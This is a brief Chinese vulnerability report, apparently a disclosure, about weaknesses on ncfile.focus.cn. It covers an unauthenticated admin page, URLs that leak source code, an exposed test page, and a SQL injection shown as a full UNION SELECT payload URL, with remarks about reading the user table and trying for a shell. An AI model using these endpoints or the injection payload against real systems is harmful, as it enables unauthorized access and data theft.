1、权限设置有问题:
直接访问后台的一个应用:ip转向审核(没搞清楚到底是干嘛的。。)
http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1
2、源码泄露
http://ncfile.focus.cn/common/modules/dmc/adm/rdistnsPYpl
http://ncfile.focus.cn/common/modules/dmc/votehouse_view.left.inc
http://ncfile.focus.cn/common/dao/dao.tpl.php
3、测试页面未删除暴露物理路径
http://ncfile.focus.cn/common/admin/test.php
4、注入,支持union,有物理路径,可以查user表,貌似可以导出文件拿shell,但没成功,好像有过滤。。。
地址就是上面那个ip转向审核系统:
http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20limit%200,1–+
